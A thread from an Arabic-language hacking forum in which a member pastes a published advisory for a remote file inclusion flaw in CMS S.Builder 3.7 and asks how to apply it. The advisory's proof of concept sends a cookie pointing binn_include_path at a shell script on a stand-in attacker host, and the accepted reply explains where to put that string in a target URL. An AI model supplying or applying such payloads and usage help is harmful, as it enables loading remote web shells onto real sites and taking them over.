التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-20-2009, 12:21 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو





AngelHeart Crew غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
AngelHeart Crew is on a distinguished road

Question مجاب: سؤال:: تطبيق ثغرة


السلام عليكم
اريد معرفة كيف اطبق هذه الثغرة

كود:
CMS S.Builder <= 3.7 RFI Vulnerability


Information:

Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions


Description:

The engine of this cms makes site files (index.php, etc) with code like:

---[ PHP Code:

if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...

-----

If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path.


PoC:

---[ HTTP Request:

GET /index.php HTTP/1.1
Host: www.site.com
c o o k i e: binn_include_path=http://evil.site.com/shell.txt?

-----


# by cr0w 
# http://cr0w-at.blogspot.com

# milw0rm.com [2009-03-09]
3xplo!t :
كود:
binn_include_path=http://evil.site.com/shell.txt?
هاد الرابط وين بدي احطه
بعد رابط الموقع
ام بعد الاندكس ؟؟؟

---------------------

يرجى نقل موضوعي الى هذا القسم وبعتذر لانو كتبته في المكان الخاطئ

استفسار في اختراق المواقع
---------------------


Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC schg:: j'fdr eyvm


التعديل الأخير تم بواسطة AngelHeart Crew ; 09-20-2009 الساعة 12:27 PM.

   

رد مع اقتباس
أفضل جواب - كتبه THE WARRIOR
اخى ضعه بعد الموقع يعنى زى هك
http://www.vbspiders.com/binn_includ...com/shell.txt?
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مشكلة عند تطبيق ثغرة اللوكل فيل انكلود medoo_mohamed جـــ'ابات العناكــ'ب 2 04-04-2018 08:50 PM
ثغرة ميتا جديدة لإختراق ويندوز فيستا + شرح استغلالها , تحميل الميتا الجديد ! 500 ثغرة :] Hαcĸer'ѕ Kιɴɢ قســم إختــراق الأجهــزة 4 11-27-2010 04:01 AM
تطبيق دروس الدورة الشبح المرح SQL قواعد البيانات 8 02-20-2010 10:37 PM
تطبيق على الدرس الرابع من الدورة MasTer MiND Hackers Showoff 5 07-24-2009 12:26 AM


الساعة الآن 03:16 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0